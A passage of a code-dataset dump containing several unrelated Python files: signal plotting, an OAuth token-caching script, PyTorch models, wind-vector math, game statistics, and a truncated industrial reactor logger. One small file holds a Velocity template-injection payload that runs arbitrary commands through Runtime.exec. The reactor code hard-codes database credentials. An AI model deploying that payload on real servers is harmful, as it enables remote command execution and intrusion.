(created if needed)\n If many plots are requested, a new figure is created for each plot\n \n \"\"\" \n \n def plot_one_spectrogram(ax, X_pwr, t_ax, f_ax, title_str, t_range, f_range, c_range, c_map):\n \"\"\"\n Plots ONLY ONE Spectrogram\n \"\"\"\n T, F = np.meshgrid(t_ax, f_ax) \n X_plot = 10 * np.log10(X_pwr[:,:].transpose() + np.finfo(float).eps) \n pmesh = plt.pcolormesh(T,F,X_plot, cmap=c_map)\n \n # Major and Minor ticks\n ax = plt.gca()\n ax.xaxis.set_major_locator(ticker.AutoLocator())\n ax.xaxis.set_minor_locator(ticker.AutoMinorLocator())\n ax.yaxis.set_major_locator(ticker.AutoLocator())\n ax.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n \n plt.xlabel('fime (s)')\n plt.ylabel('frequency (Hz)')\n \n \n if t_range is not None:\n xlim = t_range\n else:\n xlim = t_ax\n \n if f_range is not None:\n ylim = f_range\n else:\n ylim = f_ax\n \n # set the limits of the plot to the limits of the data\n plt.axis([xlim.min(), xlim.max(), ylim.min(), ylim.max()])\n \n if c_range is not None:\n clim = c_range\n else:\n clim = np.array([np.mean(X_plot), np.amax(X_plot)]) \n \n pmesh.set_clim(vmin=clim[0], vmax=clim[1])\n \n plt.colorbar()\n plt.title(title_str)\n plt.draw()\n\n \n # validate 'ix' argument \n if ix is None:\n ix = range(0, spectrogram_data['power_spectrogram'].shape[2])\n elif np.isscalar(ix):\n ix = np.array([ix])\n \n # Check if ix has ONLY one element\n if len(ix) == 1:\n new_figure = False\n # Retrieve Current Axes handle from the Current Figure, if there is not\n # Current Figure, it's generated here \n ax = plt.gca()\n else:\n new_figure = True\n\n for i_channel in ix: \n if new_figure:\n plt.figure()\n ax = plt.gca()\n plot_one_spectrogram(ax, \n spectrogram_data['power_spectrogram'][:, :, i_channel], \n spectrogram_data['time_axis'], \n spectrogram_data['freq_axis'], \n spectrogram_data['channel_names'][i_channel],\n t_range, f_range, c_range, c_map) \n \n\n\ndef plot_modulation_spectrogram_data(modulation_spectrogram_data, ix=None, f_range=None, modf_range=None, c_range=None, c_map='viridis'):\n \"\"\" Plot the Power Modulation Spectrogram related to the `modulation_spectrogram_data`\n \n Parameters\n ----------\n modulation_spectrogram_data : \n Dictionary with Modulation Spectrogram data\n ix : Index of the signal (channel) to plot\n (Default, all the channels, a new figure for each)\n f_range : Frequency range\n (Default [minimum frequency, maximum frequency])\n fm_range : Modulation frequency range\n (Default [minimum mod_frequency, maximum mod_frequency])\n c_range : Color (power) range\n (Default [mean power, maximum power])\n c_map : Colot Map\n (Default viridis)\n \n Returns\n -------\n If only a plot is requested, it is plotted in the existen axes (created if needed)\n If many plots are requested, a new figure is created for each plot\n \n \"\"\" \n \n def plot_one_modulation_spectrogram(ax, X_pwr, f_ax, modf_ax, title_str, f_range, modf_range, c_range, c_map):\n \"\"\"\n Plots ONLY ONE Modulation Spectrogram\n \"\"\"\n MF, F = np.meshgrid(modf_ax, f_ax) \n X_plot = 10 * np.log10(X_pwr[:,:] + np.finfo(float).eps) \n pmesh = plt.pcolormesh(MF, F, X_plot, cmap =c_map)\n \n # Major and Minor ticks\n ax = plt.gca()\n ax.xaxis.set_major_locator(ticker.AutoLocator())\n ax.xaxis.set_minor_locator(ticker.AutoMinorLocator())\n ax.yaxis.set_major_locator(ticker.AutoLocator())\n ax.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n \n plt.xlabel('modulation frequency (Hz)')\n plt.ylabel('conventional frequency (Hz)')\n \n \n if modf_range is not None:\n xlim = modf_range\n else:\n xlim = modf_ax\n \n if f_range is not None:\n ylim = f_range\n else:\n ylim = f_ax\n \n # set the limits of the plot to the limits of the data\n plt.axis([xlim.min(), xlim.max(), ylim.min(), ylim.max()])\n \n if c_range is not None:\n clim = c_range\n else:\n clim = np.array([np.mean(X_plot), np.amax(X_plot)]) \n \n pmesh.set_clim(vmin=clim[0], vmax=clim[1])\n \n plt.colorbar()\n plt.title(title_str)\n plt.draw()\n \n # validate 'ix' argument \n if ix is None:\n ix = range(0, modulation_spectrogram_data['power_modulation_spectrogram'].shape[2])\n elif np.isscalar(ix):\n ix = np.array([ix])\n \n # Check if ix has ONLY one element\n if len(ix) == 1:\n new_figure = False\n # Retrieve Current Axes handle from the Current Figure, if there is not\n # Current Figure, it's generated here \n ax = plt.gca()\n else:\n new_figure = True\n\n for i_channel in ix: \n if new_figure:\n plt.figure()\n ax = plt.gca()\n plot_one_modulation_spectrogram(ax, \n modulation_spectrogram_data['power_modulation_spectrogram'][:, :, i_channel], \n modulation_spectrogram_data['freq_axis'], \n modulation_spectrogram_data['freq_mod_axis'], \n modulation_spectrogram_data['channel_names'][i_channel],\n f_range, modf_range, c_range, c_map) \n\n\ndef plot_psd_data(psd_data, ix=None, p_range=None, f_range=None):\n \"\"\" Plot the PSD related to the `psd_data`\n \n Parameters\n ----------\n psd_data : \n Dictionary with PSD data\n ix : Index of the signal (channel) to plot\n (Default, all the channels, a new figure for each)\n p_range : Power range\n (Default [minimum power, maximum power])\n f_range : Frequency range\n (Default [minimum frequency, maximum frequency])\n \n Returns\n -------\n If only a plot is requested, it is plotted in the existen axes (created if needed)\n If many plots are requested, a new figure is created for each plot\n \n \"\"\" \n \n def plot_one_psd(ax, X_pwr, f_ax, title_str, p_range, f_range):\n \"\"\"\n Plots ONLY ONE PSD\n \"\"\" \n X_plot = 10 * np.log10(X_pwr + np.finfo(float).eps) \n plt.plot(f_ax, X_plot)\n \n # Major and Minor ticks\n ax = plt.gca()\n ax.xaxis.set_major_locator(ticker.AutoLocator())\n ax.xaxis.set_minor_locator(ticker.AutoMinorLocator())\n ax.yaxis.set_major_locator(ticker.AutoLocator())\n ax.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n \n plt.xlabel('frequency (Hz)')\n plt.ylabel('power (dB/Hz)')\n \n \n if f_range is not None:\n xlim = f_range\n else:\n xlim = f_ax\n \n if p_range is not None:\n ylim = p_range\n else:\n ylim = X_plot\n \n # set the limits of the plot to the limits of the data\n plt.axis([xlim.min(), xlim.max(), ylim.min(), ylim.max()])\n \n plt.title(title_str)\n plt.draw()\n \n # validate 'ix' argument \n if ix is None:\n ix = range(0, psd_data['PSD'].shape[1])\n elif np.isscalar(ix):\n ix = np.array([ix])\n \n # Check if ix has ONLY one element\n if len(ix) == 1:\n new_figure = False\n # Retrieve Current Axes handle from the Current Figure, if there is not\n # Current Figure, it's generated here \n ax = plt.gca()\n else:\n new_figure = True\n\n for i_channel in ix: \n if new_figure:\n plt.figure()\n ax = plt.gca()\n plot_one_psd(ax, \n psd_data['PSD'][:, i_channel], \n psd_data['freq_axis'], \n psd_data['channel_names'][i_channel],\n p_range, f_range) \n\n\ndef plot_signal(x, fs, name=None):\n \"\"\"Behaves as matplotlib.pyplot.plot(x) but X axis is definded by `fs` [Hz]\n \n Parameters\n ----------\n x : \n 1D or 2D Signals as column vectors \n fs :\n Sampling frequency in Hz\n name :\n Name of the signal (Default 'Signal-01')\n \"\"\"\n \n # Create time vector\n time_vector = np.arange(x.shape[0])/fs\n \n plt.plot(time_vector,x)\n plt.xlabel('time (s)')\n plt.xlim([time_vector.min(), time_vector.max()])\n \n if name is None:\n name = 'Signal-01'\n \n plt.title(name)\n plt.draw()\n\nif __name__ == '__main__':\n \n # Example data\n fs = 256\n t_5s = np.arange(20*fs)/fs\n freqs = np.arange(1,101)\n x = np.asarray([np.sin(8*2*np.pi*t_5s), np.sin(25*2*np.pi*t_5s)])\n \n x = np.transpose(x)\n # x is composed by two signals:\n # 1) a 8 Hz sine wave\n # 2) a 25 hz sine wave \n \n # Compute modulation spectrogram with CWT \n w = wavelet_modulation_spectrogram(x, fs)\n \n # Compute modulation spectrogram with STFT\n f = strfft_modulation_spectrogram(x, fs, 1*fs, 0.5*fs)\n \n plot_modulation_spectrogram_data(w)\n plot_spectrogram_data(w['spectrogram_data'])\n \n plot_modulation_spectrogram_data(f, c_map='jet')\n plot_spectrogram_data(f['spectrogram_data'], c_map='jet') \n","repo_name":"MuSAELab/amplitude-modulation-analysis-module","sub_path":"am_analysis/am_analysis.py","file_name":"am_analysis.py","file_ext":"py","file_size_in_byte":55401,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"45"} +{"seq_id":"12697675381","text":"#!/usr/bin/env python\n# if we don't have a refresh token cached on disk, go get one.\n# spin up a simple Web server that will listen for auth code, then exchange that for a token and cache it locally in a file.\nimport ssl\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport json, requests\n\nconfig_file = \"config.json\"\nif config_file:\n with open(config_file, \"r\") as f:\n config_data = f.read()\n config = json.loads(config_data)\nelse:\n raise ValueError(\"Please provide config.json file with account information.\")\n\nclient_id = config[\"client_id\"] # Multi-tenant DriveReader App\nredirect_uri = config[\"redirect_uri\"]\nscopes = config[\"scopes\"]\n\n\ndef getAuthzToken(client_id, code, redirect_uri, scopes, is_msa_account):\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n params = {\n # Request parameters\n }\n url = f\"https://login.microsoftonline.com/common/oauth2/v2.0/token\"\n data = {\n \"client_id\": f\"{client_id}\",\n \"scope\": f\"{scopes}\",\n \"code\": f\"{code}\",\n \"redirect_uri\": f\"{redirect_uri}\",\n \"grant_type\": \"authorization_code\",\n }\n if is_msa_account == True:\n url = \"https://login.live.com/oauth20_token.srf\"\n req = requests.post(url, params=params, data=data, headers=headers)\n content = json.loads(req.content)\n refresh_token = content[\"refresh_token\"]\n return refresh_token\n\n\n# TODO: spinning up a web server might be overkill. Consider doing something simpler like straight up socket connection.\nclass HTTPServer_RequestHandler(BaseHTTPRequestHandler):\n # GET\n def do_GET(self):\n is_msa_account = False\n # Send response status code\n self.send_response(200)\n # Send headers\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n x = str.split(self.path, \"=\")\n print(f\"\\nGet string: split on '=': {x}\")\n if len(x) >= 2:\n raw_code = x[1]\n if len(x) == 2:\n code = raw_code\n else:\n code = raw_code.split(\"&\")[0]\n print(code)\n try:\n if len(code.split(\".\")[2]) == 37:\n is_msa_account = True\n except Exception as e:\n print(e)\n pass\n refresh_token = getAuthzToken(\n client_id, code, redirect_uri, scopes, is_msa_account\n )\n with open(\"refresh.txt\", \"w\") as token_file:\n token_file.write(refresh_token)\n self.wfile.write(\n bytes(\n \"Cached refresh token locally. You can close this window and shutdown the server script.\",\n \"utf8\",\n )\n )\n return\n\n\ndef run():\n import webbrowser\n\n print(\"starting server...\")\n\n server_address = (\"127.0.0.1\", 8076)\n httpd = HTTPServer(server_address, HTTPServer_RequestHandler)\n\n print(\"running server...\")\n\n httpd.serve_forever()\n\n\nimport webbrowser\n\nauth_site = f\"https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id={client_id}&redirect_uri={redirect_uri}&response_type=code&scope={scopes}\"\n# Open url in a new window of the default browser, if possible\nwebbrowser.open_new(auth_site)\n\nrun()\n","repo_name":"rtreit/christmas-namedraw","sub_path":"cache_refresh_token.py","file_name":"cache_refresh_token.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"74136019975","text":"import torch.nn as nn\r\nimport torch\r\nfrom torch.nn import TransformerEncoderLayer\r\nfrom Attention.attention import Attention\r\n\r\n# from transformers import GPT2LMHeadModel, GPT2Tokenizer\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\n\r\nclass Model(nn.Module):\r\n\r\n def __init__(self, model, data, hidden_size, num_layers):\r\n super().__init__()\r\n self.model = model\r\n # batch_size, length, input_dim = data.shape[0], data.shape[1], data.shape[2] # batch_size代表数据总长度\r\n batch_size, length, input_dim = data.shape[0], data.shape[1], 1 # batch_size代表数据总长度\r\n self.batch_size, self.length, self.input_dim = batch_size, length, input_dim\r\n # LSTM\r\n self.lstm = nn.LSTM(input_dim, hidden_size, num_layers, batch_first=True).to(device)\r\n self.lstm_mlp = nn.Sequential(\r\n nn.Linear((length - 1) * hidden_size, hidden_size),\r\n nn.ReLU(),\r\n nn.Linear(hidden_size, 1),\r\n ).to(device)\r\n self.lstm_linear = nn.Linear(hidden_size, 1).to(device)\r\n # GRU\r\n self.gru = nn.GRU(input_dim, hidden_size, num_layers, batch_first=True).to(device)\r\n self.gru_linear = nn.Linear(hidden_size, 1).to(device)\r\n self.gru_c1 = nn.Sequential(\r\n nn.Linear((length - 1) * hidden_size, hidden_size),\r\n # nn.Sigmoid(),\r\n nn.ReLU(),\r\n nn.Linear(hidden_size, hidden_size)\r\n ).to(device)\r\n self.gru_c2 = nn.Sequential(\r\n nn.Linear(hidden_size, hidden_size),\r\n nn.ReLU(),\r\n nn.Linear(hidden_size, 1)\r\n ).to(device)\r\n # self.gru_c1 = nn.Linear((length - 1) * hidden_size, hidden_size)\r\n # self.gru_c2 = nn.ReLU()\r\n # self.gru_c3 = nn.Linear(hidden_size, 1)\r\n\r\n # BiLSTM\r\n self.bilstm = nn.LSTM(input_dim, hidden_size, num_layers, batch_first=True, bidirectional=True).to(device)\r\n self.bilstm_linear = nn.Linear(hidden_size * 2, length).to(device)\r\n self.bilstm_mlp = nn.Sequential(\r\n nn.Linear((length - 1) * hidden_size * 2, hidden_size),\r\n nn.ReLU(),\r\n nn.Linear(hidden_size, 1),\r\n ).to(device)\r\n # seq2seq\r\n self.encoder = nn.LSTM(input_dim, hidden_size, num_layers=1, batch_first=True).to(device)\r\n self.decoder = nn.LSTM(input_dim, hidden_size, num_layers=1, batch_first=True).to(device)\r\n self.S2S_mlp = nn.Linear(hidden_size, 1).to(device)\r\n\r\n # Transformer\r\n self.transformer_layer = TransformerEncoderLayer(input_dim, nhead=1, dim_feedforward=256, dropout=0.1).to(\r\n device)\r\n self.transformer_linear = nn.Linear(input_dim, 1).to(device)\r\n self.transformer_mlp = nn.Sequential(nn.Linear((length - 1) * input_dim, input_dim),\r\n nn.ReLU(),\r\n nn.Linear(input_dim, 1)\r\n ).to(device)\r\n # att\r\n self.linear_layers = nn.ModuleList([nn.Linear(int(hidden_size / input_dim), hidden_size) for _ in range(3)]).to(\r\n device)\r\n self.attention = Attention()\r\n self.att_linear = nn.Linear(hidden_size * input_dim, 1).to(device)\r\n # MLP\r\n self.mlp_layer = nn.Sequential(\r\n nn.Linear((length - 1) * input_dim, input_dim),\r\n nn.ReLU(inplace=True),\r\n nn.Linear(input_dim, input_dim),\r\n # nn.ReLU(inplace=True)\r\n ).to(device)\r\n self.mlp_layer_c1 = nn.Sequential(\r\n nn.Linear(input_dim, input_dim),\r\n nn.ReLU(inplace=True),\r\n nn.Linear(input_dim, 1))\r\n # CNN_LSTM\r\n self.conv1 = nn.Conv1d(in_channels=input_dim, out_channels=8, kernel_size=3, padding=1).to(device)\r\n self.conv2 = nn.Conv1d(in_channels=8, out_channels=8, kernel_size=3, padding=1).to(device)\r\n self.conv3 = nn.Conv1d(in_channels=8, out_channels=8, kernel_size=3, padding=1).to(device)\r\n self.cnn_lstm = nn.LSTM(input_dim + 8, hidden_size, batch_first=True).to(device)\r\n self.cnn_lstm_linear = nn.Linear(hidden_size, 1).to(device)\r\n self.leakyrelu = nn.LeakyReLU().to(device)\r\n # Casual\r\n self.conv1d = nn.Conv1d(in_channels=input_dim, out_channels=32, kernel_size=3, padding=2, dilation=1)\r\n self.conv1d_1 = nn.Conv1d(in_channels=32, out_channels=32, kernel_size=3, padding=2, dilation=1)\r\n # padding =(kernel_size-1)*dilation)\r\n self.casual_lstm = nn.LSTM(32, hidden_size, num_layers, batch_first=True).to(device)\r\n self.casual_mlp = nn.Sequential(\r\n nn.Linear((length - 1) * hidden_size, hidden_size),\r\n nn.ReLU(inplace=True),\r\n nn.Linear(hidden_size, 1)\r\n ).to(device)\r\n\r\n def forward(self, diff_before_result):\r\n if self.model == 'LSTM':\r\n train_before_data = diff_before_result[:, :-1, :]\r\n train_before_output, _ = self.lstm(train_before_data)\r\n # train_before_output = self.lstm_linear(train_before_output[:, -1, :])\r\n train_before_output = train_before_output.reshape(diff_before_result.shape[0], -1)\r\n # train_after_output = train_after_output.reshape(diff_flip_after_result.shape[0], -1)\r\n # train_before_output = self.lstm_mlp(train_before_output)\r\n # train_after_output = self.lstm_mlp(train_after_output)\r\n # output = (train_before_output + train_after_output) / 2\r\n # output = train_after_output\r\n output = train_before_output\r\n return output, diff_before_result[:, -1:, -1]\r\n elif self.model == 'Transformer':\r\n train_before_data = diff_before_result[:, :-1, :]\r\n bc = train_before_data.shape[0]\r\n # train_after_data = diff_flip_after_result[:, :-1, :]\r\n train_before_output = self.transformer_layer(train_before_data)\r\n # train_after_output = self.transformer_layer(train_after_data)\r\n # train_before_output = self.transformer_linear(train_before_output[:, -1, :])\r\n train_before_output = self.transformer_mlp(train_before_output.reshape(bc, -1))\r\n # train_after_output = self.transformer_linear(train_after_output[:, -1, :])\r\n # output = (train_before_output + train_after_output) / 2\r\n output = train_before_output\r\n # output = train_after_output\r\n return output, diff_before_result[:, -1:, -1]\r\n elif self.model == 'LSTM_att':\r\n train_before_data = diff_before_result[:, :-1, :]\r\n # train_after_data = diff_flip_after_result[:, :-1, :]\r\n train_before_output, _ = self.lstm(train_before_data)\r\n # train_after_output, _ = self.lstm(train_after_data)\r\n output = train_before_output\r\n # output = train_after_output\r\n # output = train_before_output + train_after_output\r\n B, L, H = output.shape[0], output.shape[1], output.shape[2]\r\n x = output.reshape(B, L, self.input_dim, int(H / self.input_dim))\r\n query, key, value = [l(x) for l, x in zip(self.linear_layers, (x, x, x))]\r\n att_x, attn = self.attention(query, key, value, dropout_value=0.1)\r\n att_x = att_x.reshape(B, L, self.input_dim * H)\r\n output = self.att_linear(att_x[:, -1, :])\r\n return output, diff_before_result[:, -1:, -1]\r\n elif self.model == 'Seq2Seq':\r\n train_before_data = diff_before_result[:, :-1, :]\r\n e_input = train_before_data\r\n e_output, e_h_c = self.encoder(e_input)\r\n d_input = train_before_data\r\n d_h_c = e_h_c\r\n d_output, d_h_c = self.decoder(d_input, d_h_c)\r\n train_before_output = self.S2S_mlp(d_output[:, -1, :])\r\n output = train_before_output\r\n return output, diff_before_result[:, -1:, -1]\r\n elif self.model == 'MLP':\r\n train_before_data = diff_before_result[:, :-1, :]\r\n bc = train_before_data.shape[0]\r\n hidden_1 = self.mlp_layer(train_before_data.reshape(bc, -1))\r\n hidden = self.normalize(hidden_1)\r\n train_before_output = self.mlp_layer_c1(hidden_1)\r\n # train_before_output = self.mlp_layer(train_before_data.reshape(bc, -1))\r\n output = train_before_output\r\n return output, diff_before_result[:, -1:, -1], hidden\r\n elif self.model == 'CNN_LSTM':\r\n train_before_data = diff_before_result[:, :-1, :]\r\n cnn_out1 = self.conv1(train_before_data.transpose(1, 2))\r\n cnn_out2 = self.conv2(cnn_out1)\r\n cnn_out3 = self.conv3(cnn_out2)\r\n M1_data = cnn_out3.transpose(1, 2)\r\n M1_data = torch.cat((train_before_data, M1_data), dim=2)\r\n train_before_output, _ = self.cnn_lstm(M1_data)\r\n bc = train_before_output.shape[0]\r\n c1 = self.gru_c1(train_before_output.reshape(bc, -1))\r\n c1 = self.normalize(c1)\r\n train_before_output = self.gru_c2(c1)\r\n # train_before_output = self.cnn_lstm_linear(train_before_output[:, -1, :])\r\n output = train_before_output\r\n return output, diff_before_result[:, -1:, -1], c1\r\n elif self.model == 'GRU':\r\n train_before_data = diff_before_result[:, :-1, :]\r\n train_before_output, _ = self.gru(train_before_data)\r\n bc = train_before_output.shape[0]\r\n c1 = self.gru_c1(train_before_output.reshape(bc, -1))\r\n c = self.normalize(c1)\r\n train_before_output = self.gru_c2(c)\r\n # train_before_output = self.gru_mlp(train_before_output.reshape(bc, -1))\r\n # train_before_output = self.gru_linear(train_before_output[:, -1, :])\r\n output = train_before_output\r\n return output, diff_before_result[:, -1:, -1], c\r\n elif self.model == 'BiLSTM':\r\n train_before_data = diff_before_result[:, :-1, :]\r\n cnn_out = self.conv1d(train_before_data.transpose(1, 2))\r\n cnn_out = self.conv1d_1(cnn_out)\r\n cnn_out = cnn_out[:, :, :-self.conv1d_1.padding[0]]\r\n cnn_out = cnn_out[:, :, :-self.conv1d.padding[0]].transpose(1, 2)\r\n train_before_output, _ = self.bilstm(train_before_data)\r\n # train_before_output = self.bilstm_linear(train_before_output[:, -1, :])\r\n bc = train_before_data.shape[0]\r\n train_before_output = self.bilstm_mlp(train_before_output.reshape(bc, -1))\r\n output = train_before_output\r\n return output, diff_before_result[:, -1:, -1]\r\n elif self.model == 'CausalConv1d_LSTM':\r\n train_before_data = diff_before_result[:, :-1, :]\r\n cnn_out = self.conv1d(train_before_data.transpose(1, 2))\r\n cnn_out = self.conv1d_1(cnn_out)\r\n cnn_out = cnn_out[:, :, :-self.conv1d_1.padding[0]]\r\n cnn_out = cnn_out[:, :, :-self.conv1d.padding[0]].transpose(1, 2)\r\n train_before_output, _ = self.casual_lstm(cnn_out)\r\n bc = train_before_output.shape[0]\r\n train_before_output = self.casual_mlp(train_before_output.reshape(bc, -1))\r\n output = train_before_output\r\n return output, diff_before_result[:, -1:, -1]\r\n\r\n def normalize(self, x):\r\n buffer = torch.pow(x, 2)\r\n normp = torch.sum(buffer, 1).add_(1e-10)\r\n normalization_constant = torch.sqrt(normp)\r\n output = torch.div(x, normalization_constant.view(-1, 1).expand_as(x))\r\n return output\r\n","repo_name":"liuguoxiao/test","sub_path":"contrastive/Model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"39472157226","text":"class velocity:\n def __init__(self):\n self.name = \"velocity\"\n self.exec = True\n self.download = False\n\n def payload_test(self):\n return [\"#set ($run=347*21) $run\"]\n\n def execu(self,cmd,index=-1):\n payload = [\n '''#set($engine=\"\")\n#set($run=$engine.getClass().forName(\"java.lang.Runtime\"))\n#set($runtime=$run.getRuntime())\n#set($proc=$runtime.exec(\"'''+cmd+'''\"))\n#set($null=$proc.waitFor())\n#set($istr=$proc.getInputStream())\n#set($chr=$engine.getClass().forName(\"java.lang.Character\"))\n#set($output=\"\")\n#set($string=$engine.getClass().forName(\"java.lang.String\"))\n#foreach($i in [1..$istr.available()])\n#set($output=$output.concat($string.valueOf($chr.toChars($istr.read()))))\n#end\n${output}\n '''\n ]\n if index >= 0:\n return payload[index]\n return payload\n\n","repo_name":"rea1bacon/H4cX","sub_path":"Tools/Templatemap/velocity.py","file_name":"velocity.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"45"} +{"seq_id":"4360994250","text":"from math import cos, sin\nimport numpy as np\nfrom typing import Tuple\n\n\n# inputs: \nVECTOR_RADIUS = 20\n\n# example\ndesired_speed = np.array([0,VECTOR_RADIUS])\nwind_speed = np.array([-5, 0])\n\n\n# wind 2d orthogonal and projection\ndef get_projection_and_orthogonal_vector(v1: np.ndarray, v2: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:\n v_projection = v1 * np.dot(v1, v2) / np.dot(v1, v1)\n v_orthogonal = v2 - v_projection \n return v_projection, v_orthogonal\n\nwind_projection, wind_orthogonal = get_projection_and_orthogonal_vector(desired_speed, wind_speed)\n\n# request speed\n\ndef get_desired_speed_coefficient(desired_dir_vector, orthogonal_vector, final_vector_size): \n '''\n || alpha * desired_dir_vector || ^ 2 + || orthogonal_vector || ^ 2 = || final_vector_size || ^ 2 \n '''\n alpha = np.sqrt((final_vector_size ** 2 - np.linalg.norm(orthogonal_vector) ** 2 ) / np.linalg.norm(desired_dir_vector) ** 2 )\n return alpha\n\ndef get_compensated_vector_and_desired_vector_coefficient(desired_vector: np.ndarray, wind_vector: np.ndarray, final_vector_size: float) -> Tuple[np.ndarray, float]: \n desired_vector_coeff = get_desired_speed_coefficient(desired_speed, -wind_orthogonal, VECTOR_RADIUS)\n compensated_vector = desired_vector_coeff * desired_speed - wind_orthogonal \n return compensated_vector, desired_vector_coeff\n\nrequest_speed, desired_speed_coeff = get_compensated_vector_and_desired_vector_coefficient(desired_speed, wind_speed, VECTOR_RADIUS)\n \n\n\n\n# print results: \nprint(wind_orthogonal)\nprint(desired_speed_coeff)\nprint(request_speed)\nprint(np.linalg.norm(request_speed))\n","repo_name":"osforlife42/wind_compensation","sub_path":"wind_compensation_calcs.py","file_name":"wind_compensation_calcs.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"34410427269","text":"import pandas as pd \nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\nimport math\nimport wordninja\n\n\n#reads dataset in from kaggle into pandas\nlol_data=pd.read_csv(\"data/high_diamond_ranked_10min.csv\")\n\n\n#separates data based on team color\nred_data=lol_data.drop(['gameId','blueWins', 'blueWardsPlaced', 'blueWardsDestroyed',\n 'blueFirstBlood', 'blueKills', 'blueDeaths', 'blueAssists',\n 'blueEliteMonsters', 'blueDragons', 'blueHeralds',\n 'blueTowersDestroyed', 'blueTotalGold', 'blueAvgLevel',\n 'blueTotalExperience', 'blueTotalMinionsKilled',\n 'blueTotalJungleMinionsKilled', 'blueGoldDiff', 'blueExperienceDiff',\n 'blueCSPerMin', 'blueGoldPerMin'], axis=1)\nblue_data=lol_data.drop(['gameId','blueWins','redWardsPlaced', 'redWardsDestroyed', 'redFirstBlood', 'redKills',\n 'redDeaths', 'redAssists', 'redEliteMonsters', 'redDragons',\n 'redHeralds', 'redTowersDestroyed', 'redTotalGold', 'redAvgLevel',\n 'redTotalExperience', 'redTotalMinionsKilled',\n 'redTotalJungleMinionsKilled', 'redGoldDiff', 'redExperienceDiff',\n 'redCSPerMin', 'redGoldPerMin'], axis=1)\n\n\n\n#creates Dataframe of pvalues and t statistics\ntstats=[]\npvals=[]\nfor idx in range(len(red_data.columns)):\n tstat, pval=stats.ttest_ind(red_data.iloc[:,idx], blue_data.iloc[:,idx])\n tstats.append(round(tstat,4))\n pvals.append(round(pval,4))\nnew_names=[]\nfor col in red_data.columns:\n new_names.append(col[3:])\ndf=pd.DataFrame(list(zip(tstats, pvals)), index=new_names, columns=[\"T-stat\", \"P-value\"])\nttest=df.to_markdown()\n\n\n\n\n#graphs normal distributions\nfor idx in range(len(red_data.columns)):\n fig1, ax1=plt.subplots(1,1, figsize=(12,7))\n rmean=red_data.iloc[:,idx].mean()\n bmean=blue_data.iloc[:,idx].mean()\n red_dist=stats.norm(rmean, red_data.iloc[:,idx].std())\n blue_dist=stats.norm(bmean, blue_data.iloc[:,idx].std())\n x_range=np.linspace(red_dist.ppf(0.01), red_dist.ppf(0.99),101)\n ax1.plot(x_range, red_dist.pdf(x_range), color=\"red\")\n ax1.plot(x_range, blue_dist.pdf(x_range), color=\"blue\")\n ax1.set_title(label=' '.join(wordninja.split(red_data.columns[idx][3:])))\n ax1.set_xlabel(f\" {' '.join(wordninja.split(red_data.columns[idx][3:]))}\")\n ax1.set_ylabel(\"Percentile\")\n ax1.axvline(red_dist.mean(), color=\"red\", linestyle=':')\n ax1.axvline(blue_dist.mean(), color=\"blue\", linestyle=':')\n ax1.text(0.35,0.2,f\" Red Mean: {round(rmean, 3)} Blue Mean: {round(bmean, 3)} \", transform=plt.gca().transAxes)\n plt.show()\n\n \n\n\n\n\n\n\n","repo_name":"dsouzaj98/LOL-Resources","sub_path":"src/lol_data.py","file_name":"lol_data.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"2487382265","text":"from threading import Thread\nimport time\nfrom datetime import datetime\nfrom pycomm3 import LogixDriver, SLCDriver\nimport pyodbc\n\nfrom model import ReportModel, PhaseBitOfReactor, BatchModel\n\n\nclass ReactorEndBit(Thread):\n\n def __init__(self, reactor_id, down_time_tag,reactor_name, tag_value_tag,bit_tag_label,tag_label,device_IP,reactor_index,device_id):\n super().__init__()\n self.end_bit_tag = bit_tag_label + \".Complete\"\n self.rector = reactor_name\n self.running = bit_tag_label + \".Running\"\n self.batch_number_tag = tag_label + \".BatchHeader.BatchNumber\"\n self.end_time_tag = tag_label + \".BatchHeader.BatchEndTime\"\n self.product_name_tag = tag_label + \".BatchHeader.ProductName\"\n self.phase_count_tag=bit_tag_label+\".TotalSteps\"\n self.start_time_tag = tag_label + \".BatchHeader.BatchStartTime\"\n self.reactor_name_tag = tag_label + \".BatchHeader.UnitName\"\n self.ip = device_IP\n self.down_time_tag=down_time_tag\n self.tag_label=tag_label\n self.device_id=device_id\n self.connection = pyodbc.connect('Driver={SQL Server};'\n 'Server=DESKTOP-0I611GM\\SQLEXPRESS;'\n 'Database=NewWeb1;'\n 'UID=sa;'\n 'PWD=Servilink@123;')\n self.cursor = self.connection.cursor()\n\n def dateFormate(self,string_date):\n datedata = string_date.split(\"/\")\n timedata = datedata[3].split(\":\")\n datetime2 = datetime(int(datedata[2]), int(datedata[1]), int(datedata[0]), int(timedata[0]), int(timedata[1]),\n int(timedata[2]))\n\n return datetime2\n\n def endBit(self):\n # try:\n while True:\n # print(\"endbit\")\n # print(\"ip\", self.ip)\n with LogixDriver(self.ip) as plc:\n print(\"connection\", plc.connected)\n data = plc.read(self.running)\n print(\"Enddata\", data)\n if (data[1] == False):\n batchNumber = plc.read(self.batch_number_tag)\n reactorName = plc.read(self.reactor_name_tag)\n productName = plc.read(self.product_name_tag)\n start_time = plc.read(self.start_time_tag)\n batchStratTime = self.dateFormate(str(start_time[1]))\n phaseCount = plc.read(self.phase_count_tag)\n end_time = plc.read(self.end_time_tag)\n batchEndTime = 